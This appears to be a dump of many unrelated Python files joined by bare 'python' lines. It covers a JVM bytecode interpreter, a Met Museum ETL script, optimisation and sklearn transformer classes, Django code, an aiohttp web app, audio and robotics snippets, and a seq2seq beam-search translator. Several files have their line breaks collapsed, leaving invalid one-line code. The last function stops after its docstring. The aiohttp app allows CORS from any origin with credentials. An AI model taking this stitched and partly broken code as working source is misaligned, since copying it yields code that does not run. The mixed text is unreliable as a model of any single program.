            if ins.mnemonic != "invokestatic":
                obj = stack.pop()
            else:
                obj = None

            try:
                ret = callback.on_invoke(ins, const, obj, args)
            except StopIteration:
                break
            if desc.returns.name != "void":
                stack.append(ret)
        elif ins in ("astore", "istore", "lstore", "fstore", "dstore"):
            local_vars[ins.operands[0].value] = stack.pop()
        elif ins in ("aload", "iload", "lload", "fload", "dload"):
            stack.append(local_vars[ins.operands[0].value])
        elif ins == "dup":
            stack.append(stack[-1])
        elif ins == "pop":
            stack.pop()
        elif ins == "anewarray":
            stack.append([None] * stack.pop())
        elif ins == "newarray":
            stack.append([0] * stack.pop())
        elif ins in ("aastore", "bastore", "castore", "sastore", "iastore", "lastore", "fastore", "dastore"):
            value = stack.pop()
            index = stack.pop()
            array = stack.pop()
            if isinstance(array, list) and isinstance(index, int):
                array[index] = value
            elif verbose:
                print("Failed to execute %s: array %s index %s value %s" %
                      (ins, array, index, value))
        elif ins in ("aaload", "baload", "caload", "saload", "iaload", "laload", "faload", "daload"):
            index = stack.pop()
            array = stack.pop()
            if isinstance(array, list) and isinstance(index, int):
                # BUG FIX: this was `stack.push(...)`, which does not exist
                # on Python lists and raised AttributeError at runtime.
                stack.append(array[index])
            elif verbose:
                print("Failed to execute %s: array %s index %s" %
                      (ins, array, index))
        elif ins == "invokedynamic":
            const = ins.operands[0]
            method_desc = const.name_and_type.descriptor.value
            desc = method_descriptor(method_desc)
            num_args = len(desc.args)

            args = []
            for i in six.moves.range(num_args):
                args.insert(0, stack.pop())

            stack.append(callback.on_invokedynamic(ins, ins.operands[0], args))
        elif ins == "checkcast":
            # Type assertions have no effect on our abstract interpretation.
            pass
        elif verbose:
            print("Unknown instruction %s: stack is %s" % (ins, stack))

    last_ins = ins_list[-1]
    if last_ins.mnemonic in ("ireturn", "lreturn", "freturn", "dreturn", "areturn"):
        # Non-void method returning
        return stack.pop()
    elif last_ins.mnemonic == "return":
        # Void method returning
        pass
    elif verbose:
        # BUG FIX: this used to print the loop variable `ins` instead of
        # the actual final instruction.
        print("Unexpected final instruction %s: stack is %s" % (last_ins, stack))


def get_enum_constants(cf, verbose):
    """
    Gets enum constants declared in the given class.

    javac compiles each enum constant into a public static final field
    carrying ACC_ENUM, initialized at the start of <clinit> with the
    pattern:

        new <enum class or anonymous subclass>
        dup
        ldc "<constant name>"          (this string is kept by obfuscators,
                                        since valueOf() needs it)
        <ordinal and constructor arguments>
        invokespecial <init>
        putstatic <the constant's field>

    We only want the constants themselves -- not other static fields such
    as aliases (e.g. a RECOMMENDED_VALUE referring to one of the constants)
    nor the synthetic $VALUES array; the ACC_ENUM flag on the field
    distinguishes them.  Returns {name: {'name', 'field', 'class'}}.
    """
    if not cf.access_flags.acc_enum:
        raise Exception(cf.this.name.value + " is not an enum!")

    enum_fields = list(cf.fields.find(f=lambda field: field.access_flags.acc_enum))

    enum_class = None
    enum_name = None

    result = {}
    for ins in cf.methods.find_one(name="<clinit>").code.disassemble():
        if ins == "new" and enum_class is None:
            const = ins.operands[0]
            enum_class = const.name.value
        elif ins in ("ldc", "ldc_w") and enum_name is None:
            const = ins.operands[0]
            if isinstance(const, String):
                enum_name = const.string.value
        elif ins == "putstatic":
            if enum_class is None or enum_name is None:
                if verbose:
                    print("Ignoring putstatic for %s as enum_class or enum_name is unset" % str(ins))
                continue
            const = ins.operands[0]
            assigned_field = const.name_and_type
            if not any(field.name == assigned_field.name and
                       field.descriptor == assigned_field.descriptor
                       for field in enum_fields):
                # This could happen with an enum constant that sets a field in
                # its constructor, which is unlikely but possible (e.g. a
                # constant declared as FOO(i = 2) writing a static int i).
                if verbose:
                    print("Ignoring putstatic for %s as it is to a field not in enum_fields (%s)" % (str(ins), enum_fields))
                continue
            result[enum_name] = {
                'name': enum_name,
                'field': assigned_field.name.value,
                'class': enum_class
            }

            enum_class = None
            enum_name = None

            if len(result) == len(enum_fields):
                break

    if verbose and len(result) != len(enum_fields):
        print("Did not find assignments to all enum fields - fields are %s and result is %s" % (result, enum_fields))

    return result
python
"""
Content Provider:       Metropolitan Museum of Art

ETL Process:            Use the API to identify all CC0 artworks.

Output:                 TSV file containing the image, their respective meta-data.

Notes:                  https://metmuseum.github.io/
                        No rate limit specified.
"""
from modules.etlMods import *

DELAY = 1.0  # time delay (in seconds) between API requests
FILE = 'metmuseum_{}.tsv'.format(int(time.time()))

logging.basicConfig(format='%(asctime)s: [%(levelname)s - Met Museum API] =======> %(message)s', level=logging.INFO)


def getObjectIDs(_date=None):
    """Get a list of recently updated/uploaded objects.

    If no date is specified, return all objects.
    Returns [totalObjects, objectIDs] or None on failure.
    """
    objectDate = ''
    if _date:
        objectDate = '?metadataDate={}'.format(_date)

    endpoint = 'https://collectionapi.metmuseum.org/public/collection/v1/objects{}'.format(objectDate)
    result = requestContent(endpoint)

    if result:
        totalObjects = result['total']
        objectIDs = result['objectIDs']
    else:
        logging.warning('Content not available!')
        return None

    return [totalObjects, objectIDs]


def getMetaData(_objectID):
    """Fetch one object, validate its CC0 status, and write its image rows
    (primary plus any additional images) to the TSV file.

    Returns the number of rows written, or None when the object is skipped.
    """
    logging.info('Processing object: {}'.format(_objectID))

    license = 'CC0'
    version = '1.0'
    metaData = {}
    extracted = []
    startTime = time.time()
    idx = 0

    endpoint = 'https://collectionapi.metmuseum.org/public/collection/v1/objects/{}'.format(_objectID)
    objectData = requestContent(endpoint)

    if objectData is None:
        logging.error('Unable to process object ID: {}'.format(_objectID))
        return None

    message = objectData.get('message')
    if message:
        logging.warning('{}: {}'.format(message, _objectID))
        return None

    # validate CC0 license
    isCC0 = objectData.get('isPublicDomain')
    if (isCC0 is None) or (isCC0 == False):
        logging.warning('CC0 license not detected!')
        return None

    # get the landing page
    foreignURL = objectData.get('objectURL', None)
    if foreignURL is None:
        logging.warning('Landing page not detected!')
        return None

    # get the title
    title = sanitizeString(objectData.get('title', ''))

    # get creator info
    creator = sanitizeString(objectData.get('artistDisplayName', ''))

    # the foreign identifier is the Met object id
    foreignID = _objectID

    # additional metadata fields
    metaData['accession_number'] = sanitizeString(objectData.get('accessionNumber', ''))
    metaData['classification'] = sanitizeString(objectData.get('classification', ''))
    metaData['culture'] = sanitizeString(objectData.get('culture', ''))
    metaData['date'] = sanitizeString(objectData.get('objectDate', ''))
    metaData['medium'] = sanitizeString(objectData.get('medium', ''))
    metaData['credit_line'] = sanitizeString(objectData.get('creditLine', ''))
    # metaData['geography'] = objectData.get('geographyType', '')

    # get the image url and thumbnail
    # BUG FIX: the API can return an empty string for primaryImage; the old
    # `is None` test let empty URLs through.
    imgURL = objectData.get('primaryImage')
    if not imgURL:
        logging.warning('Image not detected in url {}'.format(foreignURL))
        return None

    thumbnail = ''
    if '/original/' in imgURL:
        thumbnail = imgURL.replace('/original/', '/web-large/')

    # BUG FIX: additionalImages may be missing or None; len() would raise.
    otherImages = objectData.get('additionalImages') or []
    if otherImages:
        idx = 1
        # mark the primary image as part of a set when more images follow
        metaData['set'] = foreignURL

    extracted.append([
        str(foreignID), foreignURL, imgURL, thumbnail,
        '\\N', '\\N', '\\N', license, str(version), creator, '\\N',
        title, json.dumps(metaData), '\\N', 'f', 'met', 'met'
    ])

    # extract the additional images
    for img in otherImages:
        foreignID = '{}-{}'.format(_objectID, idx)
        imgURL = img
        thumbnail = ''
        if imgURL:
            if '/original/' in imgURL:
                thumbnail = imgURL.replace('/original/', '/web-large/')

            extracted.append([
                str(foreignID), foreignURL, imgURL, thumbnail,
                '\\N', '\\N', '\\N', license, str(version), creator, '\\N',
                title, json.dumps(metaData), '\\N', 'f', 'met', 'met'
            ])
        idx += 1

    writeToFile(extracted, FILE)
    delayProcessing(startTime, DELAY)

    return len(extracted)


def execJob(_param=None):
    """Run the extraction for all object IDs matching `_param` (a date or None)."""
    result = getObjectIDs(_param)
    if result:
        logging.info('Total objects found: {}'.format(result[0]))
        extracted = map(lambda obj: getMetaData(obj), result[1])
        logging.info('Total CC0 images: {}'.format(sum(filter(None, extracted))))


def main():
    """Parse CLI arguments and kick off the ETL job."""
    logging.info('Begin: Met Museum API requests')
    param = None
    mode = 'date: '

    parser = argparse.ArgumentParser(description='Met Museum API Job', add_help=True)
    parser.add_argument('--mode', choices=['default', 'all'],
                        help='Identify all artworks from the previous day [default] or process the entire collection [all].')
    parser.add_argument('--date', type=lambda dt: datetime.strptime(dt, '%Y-%m-%d'),
                        help='Identify artworks published on a given date (format: YYYY-MM-DD).')
    args = parser.parse_args()

    if args.date:
        param = (args.date.strftime('%Y-%m-%d'))
    elif args.mode:
        if str(args.mode) == 'default':
            # default: artworks updated yesterday
            param = datetime.strftime(datetime.now() - timedelta(1), '%Y-%m-%d')
        else:
            mode = 'all CC0 artworks'
            param = None

    mode += param if param is not None else ''
    logging.info('Processing {}'.format(mode))

    execJob(param)

    logging.info('Terminated!')


if __name__ == '__main__':
    main()
python
import numpy as np from pymoo.experimental.deriv import DerivationBasedAlgorithm from pymoo.algorithms.base.line import LineSearchProblem from pymoo.algorithms.soo.univariate.exp import ExponentialSearch from pymoo.algorithms.soo.univariate.golden import GoldenSectionSearch from pymoo.core.population import Population from pymoo.util.vectors import max_alpha class GradientDescent(DerivationBasedAlgorithm): def direction(self, dF, **kwargs): return - dF def step(self): problem, sol = self.problem, self.opt[0] self.evaluator.eval(self.problem, sol, evaluate_values_of=["dF"]) dF = sol.get("dF")[0] print(sol) if np.linalg.norm(dF) ** 2 < 1e-8: self.termination.force_termination = True return direction = self.direction(dF) line = LineSearchProblem(self.problem, sol, direction, strict_bounds=self.strict_bounds) alpha = self.alpha if self.strict_bounds: if problem.has_bounds(): line.xu = np.array([max_alpha(sol.X, direction, *problem.bounds(), mode="all_hit_bounds")]) # remember the step length from the last run alpha = min(alpha, line.xu[0]) if alpha == 0: self.termination.force_termination = True return # make the solution to be the starting point of the univariate search x0 = sol.copy(deep=True) x0.set("__X__", x0.get("X")) x0.set("X", np.zeros(1)) # determine the brackets to be searched in exp = ExponentialSearch(delta=alpha).setup(line, evaluator=self.evaluator, termination=("n_iter", 20), x0=x0) a, b = exp.run().pop[-2:] # search in the brackets res = GoldenSectionSearch().setup(line, evaluator=self.evaluator, termination=("n_iter", 20), a=a, b=b).run() infill = res.opt[0] # set the alpha value and revert the X to be the multi-variate one infill.set("X", infill.get("__X__")) self.alpha = infill.get("alpha")[0] # keep always a few historical solutions self.pop = Population.merge(self.pop, infill)[-10:]
python
# -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2017-07-10 17:56 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('djiffy', '0001_initial'), ] operations = [ migrations.AlterModelOptions( name='canvas', options={'ordering': ['manifest', 'order'], 'permissions': (('view_manifest', 'Can view IIIF Canvas'),), 'verbose_name': 'IIIF Canvas', 'verbose_name_plural': 'IIIF Canvases'}, ), migrations.AlterModelOptions( name='manifest', options={'permissions': (('view_canvas', 'Can view IIIF Manifest'),), 'verbose_name': 'IIIF Manifest'}, ), ]
python
from django.core.management.base import BaseCommand import django.db.models.base import core.models class Command(BaseCommand): help = 'Custom manage.py command to start celery.' def add_arguments(self, parser): parser.add_argument( "needle", type=str, help="The uuid/field that you are looking for" ) def handle(self, *args, **options): needle = options.get('needle') if not needle: print "Exception: Missing value to search for" return field_type, result = find_string_in_models(core.models, needle) if not result: print "Exception:Could not find value %s in any of the imports from %s (Using %s field types)" % ( needle, core.models, field_type ) else: human_field_type = "UUID" if field_type == 'uuidfield' else 'String' if hasattr(result, 'get_source_class'): result = result.get_source_class print "%s <%s> belongs to %s %s" % ( human_field_type, needle, str(result.__class__), result ) def find_string_in_models(import_base, needle): for modelKey in import_base.__dict__.keys(): if 'pyc' not in modelKey: modelCls = getattr(import_base, modelKey) if type(modelCls) != django.db.models.base.ModelBase: continue for field in modelCls._meta.get_fields(): field_name = field.name field_type = str( modelCls._meta.get_field(field_name).get_internal_type() ).lower() if field_type in ['uuidfield', 'charfield']: res = modelCls.objects.filter(**{field_name: needle}) if res: return field_type, res.last() return (None, None)
python
from pybricks.tools import wait print("Started!") try: # Run your script here as you normally would. In this # example we just wait forever and do nothing. while True: wait(1000) except SystemExit: # This code will run when you press the stop button. # This can be useful to "clean up", such as to move # the motors back to their starting positions. print("You pressed the stop button!")
python
""" This module contains a set of functions related to strings > > strcat : String concatenation for a 1xN list > strcat_array : String concatenation for a MxN array > strrep : String replacement for array > repmat : Repeat char NxM times > find : Find the location of a input character in a string EXAMPLE -------------------------------------------------------------------------- Name : strtricks.py Author : E.Taskesen Contact : [email protected] Date : Sep. 2017 -------------------------------------------------------------------------- """ #%% Libraries import pandas as pd import numpy as np import re #%% Concatenates list # INPUT: List of strings or char: string=["aap","boom","mies"] or string="aap" def strcat(string,delim=" "): out = '' if (type(string)==list): out=delim.join(list(string)) else: out = string+delim #end # Remove last delim char #out=out[0:len(out)-len(delim)] # Return return out #%% Concatenates pandas array def strcat_array(data,delim=","): out=data.astype(str).apply(lambda x: delim.join(x), axis=1) # Remove first delim # out=out[1:len(out)] return out #%% Changes char over list def strrep(out,strFrom, strTo): for i in range(0,len(out)): out[i]=out[i].replace(strFrom,strTo) # return return out #%% Replaces [char] or [string] to [NaN] in full pandas dataframe def strrep_to_nan(out,strFrom): out = out.apply(lambda x: x.str.strip()).replace(strFrom, np.nan) # return return out #%% Repeat str for #rows and #cols def repmat(getstr, rows, cols): # INPUT: repmat("?", 10, 5): # OUTPUT: Pandas dataframe # Convert to list: out = out.values.tolist()[0] # # Multiplyl str out = [getstr] * rows # Multiple rows out = [out] * cols # Convert to pandas dataframe out = pd.DataFrame(out) # return return out #%% Find char in string and return indexes def find(getstr, ch): return [i for i, ltr in enumerate(getstr) if ltr == ch] #%%
python
from checkov.terraform.context_parsers.base_parser import BaseContextParser class ResourceContextParser(BaseContextParser): def __init__(self): definition_type = 'resource' super().__init__(definition_type=definition_type) def get_block_type(self): return self.definition_type parser = ResourceContextParser()
python
''' Por algum motivo desconhecido, Rangel só tem um par de meias de cada cor. Hoje ele está atrasado para ir a faculdade e ainda precisa pegar um par de meias, mas as meias estão todas bagunçadas. Dado o número de pares de meias na gaveta de Rangel, ele quer saber quantas meias ele precisa pegar, no mínimo, para ter pelo menos um par da mesma cor. Entrada Cada caso é composto de um único inteiro N (1 ≤ N ≤ 105) que corresponde a quantidade de pares de meias na gaveta. Saída Você deve imprimir uma linha com um único inteiro que corresponde a quantidade mínima de meias que Rangel precisa pegar. ''' print(int(input())+1)
python
"""
KGE Web User Interface Application Code package.
"""
from os import getenv, path
import logging

from kgea.server.web_services.kgea_session import KgeaSession

import jinja2
import aiohttp_jinja2
from aiohttp import web
import aiohttp_cors

from .kgea_ui_handlers import (
    kge_landing_page,
    kge_login,
    kge_client_authentication,
    get_kge_home,
    kge_logout,
    get_kge_graph_registration_form,
    view_kge_metadata,
    get_kge_fileset_registration_form,
    get_kge_file_upload_form,
    get_kge_fileset_submitted,
    get_kge_data_unavailable
)


async def make_app():
    """
    Build and configure the aiohttp application: Jinja2 templating,
    all UI routes, static assets, permissive CORS and the KGE session layer.

    :return: the configured aiohttp.web.Application
    """
    app = web.Application()

    # Configure Jinja2 template map
    templates_dir = path.join(path.dirname(__file__), 'templates')
    aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(templates_dir))

    # UI page routes: landing/authentication flow first, then the
    # registration, upload and status pages.
    app.router.add_get('/', kge_landing_page)
    app.router.add_get('/login', kge_login)
    app.router.add_get('/oauth2callback', kge_client_authentication)
    app.router.add_get('/home', get_kge_home)
    app.router.add_get('/logout', kge_logout)
    app.router.add_get('/register/graph', get_kge_graph_registration_form)
    app.router.add_get('/metadata', view_kge_metadata)
    app.router.add_get('/register/fileset', get_kge_fileset_registration_form)
    app.router.add_get('/upload', get_kge_file_upload_form)
    app.router.add_get('/submitted', get_kge_fileset_submitted)
    app.router.add_get('/unavailable', get_kge_data_unavailable)

    # Static assets are served from subdirectories of the template folder.
    app.router.add_static('/css/', path=templates_dir + '/css', name='css')
    app.router.add_static('/images/', path=templates_dir + '/images', name='images')

    # Enable CORS for all origins.
    cors = aiohttp_cors.setup(app, defaults={
        "*": aiohttp_cors.ResourceOptions(
            allow_credentials=True,
            expose_headers="*",
            allow_headers="*",
            allow_methods="*"
        )
    })

    # Register all routers for CORS.
    for route in list(app.router.routes()):
        cors.add(route)

    KgeaSession.initialize(app)

    return app


def main():
    """
    Main application entry point.
    """
    # Master flag for local development runs bypassing
    # authentication and other production processes
    # NOTE(review): os.getenv returns a *string* whenever the variable is
    # set, so DEV_MODE='0' or 'false' still evaluates truthy — confirm
    # this is intended.
    DEV_MODE = getenv('DEV_MODE', default=False)

    if DEV_MODE:
        logging.basicConfig(level=logging.DEBUG)

    # Blocks until the server shuts down; the session cleanup below runs
    # after the event loop exits.
    web.run_app(make_app(), port=8090)

    KgeaSession.close_global_session()
python
""" 05-strange-attractors.py - Non-linear ordinary differential equations. Oscilloscope part of the tutorial --------------------------------- A strange attractor is a system of three non-linear ordinary differential equations. These differential equations define a continuous-time dynamical system that exhibits chaotic dynamics associated with the fractal properties of the attractor. There is three strange attractors in the library, the Rossler, the Lorenz and the ChenLee objects. Each one can output stereo signal if the `stereo` argument is set to True. Use the "voice" slider of the window "Input interpolator" to interpolate between the three sources. Audio part of the tutorial -------------------------- It's possible to create very interesting LFO with strange attractors. The last part of this tutorial shows the use of Lorenz's output to drive the frequency of two sine wave oscillators. """ from pyo import * s = Server().boot() ### Oscilloscope ### # LFO applied to the `chaos` attribute lfo = Sine(0.2).range(0, 1) # Rossler attractor n1 = Rossler(pitch=0.5, chaos=lfo, stereo=True) # Lorenz attractor n2 = Lorenz(pitch=0.5, chaos=lfo, stereo=True) # ChenLee attractor n3 = ChenLee(pitch=0.5, chaos=lfo, stereo=True) # Interpolates between input objects to produce a single output sel = Selector([n1, n2, n3]) sel.ctrl(title="Input interpolator (0=Rossler, 1=Lorenz, 2=ChenLee)") # Displays the waveform of the chosen attractor sc = Scope(sel) ### Audio ### # Lorenz with very low pitch value that acts as a LFO freq = Lorenz(0.005, chaos=0.7, stereo=True, mul=250, add=500) a = Sine(freq, mul=0.3).out() s.gui(locals())
python
# -*- coding: utf-8 -*- import struct from io import BytesIO class Buffer(BytesIO): """ A buffer-like object with shortcut methods to read C objects """ def __read(self, size: int, unpack=None): res = self.read(size) if unpack: res = struct.unpack(unpack, res)[0] return res def read_char(self, size=1) -> bytes: """ Read `size` char(s) from the buffer and move the cursor :param size: the number of char(s) to read :return: a bytes instance """ return self.__read(size) def read_uint8(self) -> int: """ Read an unsigned int8 from the buffer and move the cursor :return: a positive integer """ return self.__read(1, "<B") def read_uint32(self) -> int: """ Read an unsigned int32 from the buffer and move the cursor :return: a positive integer """ return self.__read(4, "<I") def read_ushort(self) -> int: """ Read an unsigned short from the buffer and move the cursor :return: a positive integer """ return self.__read(2, "<H") def read_float(self) -> float: """ Read a float from the buffer and move the cursor :return: a float number """ return self.__read(4, "<f") def skip(self, size: int) -> None: """ Skip the next `size` bytes by moving the cursor :param size: number of bytes to skip """ self.__read(size)
python
"""Saturation classes.""" from __future__ import annotations from abc import ABC, abstractmethod import numpy as np from sklearn.base import BaseEstimator, TransformerMixin from sklearn.utils.validation import check_is_fitted, check_array class Saturation(BaseEstimator, TransformerMixin, ABC): """Base class for all saturations, such as Box-Cox, Adbudg, ...""" def fit(self, X: np.ndarray, y: None = None) -> Saturation: """ Fit the transformer. In this special case, nothing is done. Parameters ---------- X : Ignored Not used, present here for API consistency by convention. y : Ignored Not used, present here for API consistency by convention. Returns ------- Saturation Fitted transformer. """ X = check_array(X) self._check_n_features(X, reset=True) return self def transform(self, X: np.ndarray) -> np.ndarray: """ Apply the saturation effect. Parameters ---------- X : np.ndarray Data to be transformed. Returns ------- np.ndarray Data with saturation effect applied. """ check_is_fitted(self) X = check_array(X) self._check_n_features(X, reset=False) return self._transformation(X) @abstractmethod def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" class BoxCoxSaturation(Saturation): """ Apply the Box-Cox saturation. The formula is ((x + shift) ** exponent-1) / exponent if exponent!=0, else ln(x+shift). Parameters ---------- exponent: float, default=1.0 The exponent. shift : float, default=1.0 The shift. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> BoxCoxSaturation(exponent=0.5).fit_transform(X) array([[ 0.82842712, 61.27716808], [ 1.46410162, 61.27716808], [ 2. 
, 61.27716808]]) """ def __init__(self, exponent: float = 1.0, shift: float = 1.0) -> None: """Initialize.""" self.exponent = exponent self.shift = shift def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" if self.exponent != 0: return ((X + self.shift) ** self.exponent - 1) / self.exponent else: return np.log(X + self.shift) class AdbudgSaturation(Saturation): """ Apply the Adbudg saturation. The formula is x ** exponent / (denominator_shift + x ** exponent). Parameters ---------- exponent : float, default=1.0 The exponent. denominator_shift : float, default=1.0 The shift in the denominator. Notes ----- This version produces saturated values in the interval [0, 1]. You can use `LinearShift` from the shift module to bring it between some interval [a, b]. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> AdbudgSaturation().fit_transform(X) array([[0.5 , 0.999001 ], [0.66666667, 0.999001 ], [0.75 , 0.999001 ]]) """ def __init__(self, exponent: float = 1.0, denominator_shift: float = 1.0) -> None: """Initialize.""" self.exponent = exponent self.denominator_shift = denominator_shift def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" return X ** self.exponent / (self.denominator_shift + X ** self.exponent) class HillSaturation(Saturation): """ Apply the Hill saturation. The formula is 1 / (1 + (half_saturation / x) ** exponent). Parameters ---------- exponent : float, default=1.0 The exponent. half_saturation : float, default=1.0 The point of half saturation, i.e. Hill(half_saturation) = 0.5. 
Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> HillSaturation().fit_transform(X) array([[0.5 , 0.999001 ], [0.66666667, 0.999001 ], [0.75 , 0.999001 ]]) """ def __init__(self, exponent: float = 1.0, half_saturation: float = 1.0) -> None: """Initialize.""" self.half_saturation = half_saturation self.exponent = exponent def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" eps = np.finfo(np.float64).eps return 1 / (1 + (self.half_saturation / (X + eps)) ** self.exponent) class ExponentialSaturation(Saturation): """ Apply exponential saturation. The formula is 1 - exp(-exponent * x). Parameters ---------- exponent : float, default=1.0 The exponent. Notes ----- This version produces saturated values in the interval [0, 1]. You can use `LinearShift` from the shift module to bring it between some interval [a, b]. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> ExponentialSaturation().fit_transform(X) array([[0.63212056, 1. ], [0.86466472, 1. ], [0.95021293, 1. ]]) """ def __init__(self, exponent: float = 1.0) -> None: """Initialize.""" self.exponent = exponent def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" return 1 - np.exp(-self.exponent * X)
python
from dsbox.template.template import DSBoxTemplate from d3m.metadata.problem import TaskKeyword from dsbox.template.template_steps import TemplateSteps from dsbox.schema import SpecializedProblem import typing import numpy as np # type: ignore class UMASSClassificationTemplate(DSBoxTemplate): def __init__(self): DSBoxTemplate.__init__(self) self.template = { "name": "UMASS_classification_template", "taskSubtype": {TaskKeyword.MULTICLASS.name}, "taskType": TaskKeyword.CLASSIFICATION.name, "inputType": "table", # See SEMANTIC_TYPES.keys() for range of values "output": "model_step", # Name of the final step generating the prediction "target": "extract_target_step", # Name of the step generating the ground truth "steps": TemplateSteps.dsbox_generic_steps() + TemplateSteps.dsbox_feature_selector("classification", first_input='data', second_input='target') + [ { "name": "model_step", "primitives": "d3m.primitives.classification.multilabel_classifier.DSBOX", "inputs": ["data, target"] } ] }
python
''' This script handles local interactive inference '''
import torch
import torch.nn as nn
import torch.nn.functional as F
import argparse
import numpy as np
import spacy

from seq2seq.Models import Seq2Seq
from seq2seq.Translator import Translator
from seq2seq.Beam import Beam
from seq2seq import Constants


class Interactive(Translator):
    ''' Translator specialization for single-utterance, batch-size-1
    interactive decoding with beam search. '''

    def __init__(self, opt):
        super().__init__(opt)

    def translate_batch(self, src_seq, src_pos):
        ''' Translation work in one batch.

        Runs the encoder once, then beam-searches the decoder step by step,
        pruning finished instances from the working tensors as it goes.
        Returns (hypotheses, scores), each a list of n_best entries per
        input instance.
        '''

        def get_inst_idx_to_tensor_position_map(inst_idx_list):
            ''' Indicate the position of an instance in a tensor. '''
            return {inst_idx: tensor_position for tensor_position, inst_idx in enumerate(inst_idx_list)}

        def collect_active_part(beamed_tensor, curr_active_inst_idx, n_prev_active_inst, n_bm):
            ''' Collect tensor parts associated to active instances. '''
            # Flatten to (n_prev_active_inst, beam*rest), select the rows of
            # still-active instances, then restore the beam-expanded shape.
            _, *d_hs = beamed_tensor.size()
            n_curr_active_inst = len(curr_active_inst_idx)
            new_shape = (n_curr_active_inst * n_bm, *d_hs)

            beamed_tensor = beamed_tensor.view(n_prev_active_inst, -1)
            beamed_tensor = beamed_tensor.index_select(0, curr_active_inst_idx)
            beamed_tensor = beamed_tensor.view(*new_shape)

            return beamed_tensor

        def collate_active_info(
                src_seq, src_enc, inst_idx_to_position_map, active_inst_idx_list):
            # - Active sentences are collected so the decoder will not run on completed sentences
            n_prev_active_inst = len(inst_idx_to_position_map)
            active_inst_idx = [inst_idx_to_position_map[k] for k in active_inst_idx_list]
            active_inst_idx = torch.LongTensor(active_inst_idx).to(self.device)

            active_src_seq = collect_active_part(src_seq, active_inst_idx, n_prev_active_inst, n_bm)
            active_src_enc = collect_active_part(src_enc, active_inst_idx, n_prev_active_inst, n_bm)
            active_inst_idx_to_position_map = get_inst_idx_to_tensor_position_map(active_inst_idx_list)

            return active_src_seq, active_src_enc, active_inst_idx_to_position_map

        def beam_decode_step(
                inst_dec_beams, len_dec_seq, src_seq, enc_output, inst_idx_to_position_map, n_bm):
            ''' Decode and update beam status, and then return active beam idx '''

            def prepare_beam_dec_seq(inst_dec_beams, len_dec_seq):
                # Stack the partial hypotheses of all unfinished beams into
                # one (n_active * n_bm, len_dec_seq) batch for the decoder.
                dec_partial_seq = [b.get_current_state() for b in inst_dec_beams if not b.done]
                dec_partial_seq = torch.stack(dec_partial_seq).to(self.device)
                dec_partial_seq = dec_partial_seq.view(-1, len_dec_seq)
                return dec_partial_seq

            def prepare_beam_dec_pos(len_dec_seq, n_active_inst, n_bm):
                # Position indices 1..len_dec_seq, tiled for every active beam.
                dec_partial_pos = torch.arange(1, len_dec_seq + 1, dtype=torch.long, device=self.device)
                dec_partial_pos = dec_partial_pos.unsqueeze(0).repeat(n_active_inst * n_bm, 1)
                return dec_partial_pos

            def predict_word(dec_seq, dec_pos, src_seq, enc_output, n_active_inst, n_bm):
                dec_output, *_ = self.model.decoder(dec_seq, dec_pos, src_seq, enc_output)
                dec_output = dec_output[:, -1, :]  # Pick the last step: (bh * bm) * d_h
                word_prob = self.model.tgt_word_prj(dec_output)
                # Forbid emitting the <UNK> token.
                word_prob[:, Constants.UNK] = -float('inf')
                word_prob = F.log_softmax(word_prob, dim=1)
                word_prob = word_prob.view(n_active_inst, n_bm, -1)

                return word_prob

            def collect_active_inst_idx_list(inst_beams, word_prob, inst_idx_to_position_map):
                active_inst_idx_list = []
                for inst_idx, inst_position in inst_idx_to_position_map.items():
                    is_inst_complete = inst_beams[inst_idx].advance(word_prob[inst_position])
                    if not is_inst_complete:
                        active_inst_idx_list += [inst_idx]

                return active_inst_idx_list

            n_active_inst = len(inst_idx_to_position_map)

            dec_seq = prepare_beam_dec_seq(inst_dec_beams, len_dec_seq)
            dec_pos = prepare_beam_dec_pos(len_dec_seq, n_active_inst, n_bm)
            word_prob = predict_word(dec_seq, dec_pos, src_seq, enc_output, n_active_inst, n_bm)

            # Update the beam with predicted word prob information and collect incomplete instances
            active_inst_idx_list = collect_active_inst_idx_list(
                inst_dec_beams, word_prob, inst_idx_to_position_map)

            return active_inst_idx_list

        def collect_hypothesis_and_scores(inst_dec_beams, n_best):
            all_hyp, all_scores = [], []
            for inst_idx in range(len(inst_dec_beams)):
                scores, tail_idxs = inst_dec_beams[inst_idx].sort_scores()
                all_scores += [scores[:n_best]]

                hyps = [inst_dec_beams[inst_idx].get_hypothesis(i) for i in tail_idxs[:n_best]]
                all_hyp += [hyps]
            return all_hyp, all_scores

        with torch.no_grad():
            # - Zero out hidden state to batch size 1
            self.model.session.zero_lstm_state(1, self.device)

            # - Encode
            src_enc, *_ = self.model.encoder(src_seq, src_pos)
            src_enc, *_ = self.model.session(src_enc)

            # - Repeat data for beam search
            n_bm = self.opt.beam_size
            n_inst, len_s, d_h = src_enc.size()
            src_seq = src_seq.repeat(1, n_bm).view(n_inst * n_bm, len_s)
            src_enc = src_enc.repeat(1, n_bm, 1).view(n_inst * n_bm, len_s, d_h)

            # - Prepare beams
            inst_dec_beams = [Beam(n_bm, device=self.device) for _ in range(n_inst)]

            # - Bookkeeping for active or not
            active_inst_idx_list = list(range(n_inst))
            inst_idx_to_position_map = get_inst_idx_to_tensor_position_map(active_inst_idx_list)

            # - Decode
            for len_dec_seq in range(1, self.model_opt.max_subseq_len + 1):

                active_inst_idx_list = beam_decode_step(
                    inst_dec_beams, len_dec_seq, src_seq, src_enc, inst_idx_to_position_map, n_bm)

                if not active_inst_idx_list:
                    break  # all instances have finished their path to <EOS>

                src_seq, src_enc, inst_idx_to_position_map = collate_active_info(
                    src_seq, src_enc, inst_idx_to_position_map, active_inst_idx_list)

            hyp, scores = collect_hypothesis_and_scores(inst_dec_beams, self.opt.n_best)

        return hyp, scores


def interactive(opt):
    ''' Run a console read-translate-print loop until the user types "exit". '''

